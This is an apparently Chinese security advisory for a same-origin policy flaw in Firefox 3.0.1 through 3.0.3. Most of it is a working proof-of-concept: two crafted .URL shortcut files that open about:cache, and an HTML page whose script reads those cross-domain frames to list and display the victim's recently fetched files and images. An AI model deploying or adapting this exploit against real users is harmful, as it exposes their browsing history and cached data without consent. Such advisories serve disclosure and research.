影响版本(Vulnerable):
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
漏洞描述(Discription):
Mozilla Firefox是一款开放源代码的WEB浏览器。
Mozilla Firefox处理Internet快捷文件时存在同源策略冲突问题,远程攻击者可以利用漏洞获得其他域中的敏感 信息或进行其他攻击。
通过HTML元素运行的.URL快捷方式时Firefox的location是错误的,利用这个错误可导致任意位置的内容可被读取-缓存信息,COOKIE信息,WEB, 本地文件系统等。
目前没有解决方案提供:
http://www.mozilla.com/en-US/
测试方法(Exploit):
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 'testurl1.url':
[InternetShortcut]
URL=about:cache?device=memory
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
'testurl2.url':
[InternetShortcut]
URL=about:cache?device=disk
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----test.html-----
<script>
function a()
{
s="";
h="";
for(i=0;i<window.frames.length;i++)
{
d=window.frames[i].document;
for(j=0;j<d.links.length;j++)
{
u=d.links[j].text
s+=u+"\n";
h+="<img src=\""+u+"\">";
}
}
document.getElementById("t").value=s;
document.getElementById("x").innerHTML=h;
}
</script>
<a href="javascript:a();">Start Test</a><br>
<a href="javascript:window.location=location.href">Load This Page Again</a><br>
<br>
<br>
<b>List of files that you recently fetched from the internet:</b><br>
<textarea rows="10" cols="100" id=t wrap=off></textarea>
<br>
<br>
<b>List of images that you recently viewed on the internet:</b><br>
<div id=x></div>
<br>
<br>
<iframe width=300 height=200 src="testurl1.url"></iframe>
<iframe width=300 height=200 src="testurl2.url"></iframe> | 
